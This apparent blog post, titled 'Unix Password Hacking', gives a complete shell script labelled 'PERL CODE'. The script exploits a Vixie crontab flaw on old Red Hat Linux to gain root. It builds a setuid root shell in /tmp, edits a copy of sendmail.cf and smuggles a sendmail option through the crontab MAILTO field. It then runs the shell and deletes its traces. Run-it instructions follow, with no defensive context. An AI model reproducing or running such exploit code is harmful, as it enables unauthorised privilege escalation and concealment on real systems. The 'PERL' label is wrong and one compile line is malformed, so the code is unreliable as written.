Unix Password Hacking...................
PERL CODE
#!/bin/sh
# Vixie crontab exploit
# Local user can gain root access
#Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Programmed by Karthik.P
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
echo
echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus"
echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"
echo
echo make shell
echo
cat > /tmp/sh.c << EOF
#include
#include
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",0);
return 0;
}
EOF
echo compile shell
echo
cc -o /tmp/sh /tmp/sh.c gcc -o /tmp/sh /tmp/sh.c
echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh
echo hack sendmail.cf
echo
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
sed 's/P=/usr/bin/procmail/P=/tmp/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3
echo make cron file
echo
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF
echo input cron file
echo
crontab /tmp/cronfile
echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait
echo execute shell
echo
/tmp/sh
echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null
To make this work:Cut away what comes before "#!/bin/sh" and after "crontab /dev/null", name it something like crontab_exploit.sh and do "chmod a+x crontab_exploit.sh".
then ./crontab_exploit.sh
No comments:
Post a Comment